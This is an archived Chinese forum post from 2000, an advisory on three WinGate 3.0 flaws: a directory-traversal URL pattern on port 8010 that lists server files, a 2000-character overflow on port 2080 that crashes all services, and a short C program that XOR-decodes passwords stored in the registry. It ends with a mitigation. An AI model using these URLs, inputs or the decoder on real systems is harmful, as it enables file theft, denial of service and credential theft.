精华区 [关闭][返回]

当前位置:网易精华区>>讨论区精华>>电脑技术>>● 计算机安全>>◆系统漏洞◆>>WinGate3.0 远程/本地入侵漏洞

主题:WinGate3.0 远程/本地入侵漏洞
发信人: kevinlee()
整理人: williamlong(2000-03-24 16:01:27), 站内信件
受影响的系统:WinGate3.0 -Win9X  -WinNT
不受影响的版本: 未知远程: YES / 本地:YES

内容摘要:
作为共享internet线路的好工具,wingate的在线用户达2%以上,总用户占proxy
service类软件的比例只怕有30% 以上,但是WinGate 3.0 有3个毛病.令入侵者
可以远程侵入WinGate Server的硬盘.

漏洞的利用: 
1,远程用户可以窃取文件
毛病是wingate的Log file service引起的,默认情况下,所有的wingate service

设置为仅127.0.0.1这样的本机用户才能访问的,但是log file service是让用户
可以
远程浏览的,所以....在以前的版本就有这个毛病,现在又有不同的形式: 
假设对方运行wingate3.0,其host为 www.server.com,则可以用浏览器输入下列字
串:
1、http://www.server.com:8010/c:/ - NT/Win9x
2、http://www.server.com:8010// - NT/Win9x
3、http://www.server.com:8010/..../ - Win9x

硬盘上每个文件就这样被列了出来
二,远程攻击
wingate 3.0的winsock重定向是设置在2080端口,当你用telnet之类的程序连接到
这个port然后
发送2000个字符然后断开, 所有的wingate服务都会完蛋
三.本地用户可以窃取密码.
wingate放密码的注册表的键值是不安全的,任何本地用户都可以解密,这个密码也
许和root密码是同一个....

编译下面这段代码:#include "stdafx.h"

#include 
#include 
main(int argc, char *argv[]) {

char i;
for(i = 0; i < strlen(argv[1]); i++)
putchar(argv[1][i]^(char)((i + 1) << 1));
return 0;
}

解决方案:
锁定所有服务,只允许127.0.0.1 loopback才能访问这些services 另外两个没有
办法 :(

--
-------
Sincerly
KevinLee
http://mudfrog.126.com (网络安全站点)
irc: shell.cicnet.cc:6667 #mudfrog (网络安全频道)
irc: irc.szonline.net:6667 #internet (网络安全频道)

※ 来源:.月光软件站 http://www.moon-soft.com.[FROM: 202.96.190.124]

[关闭][返回]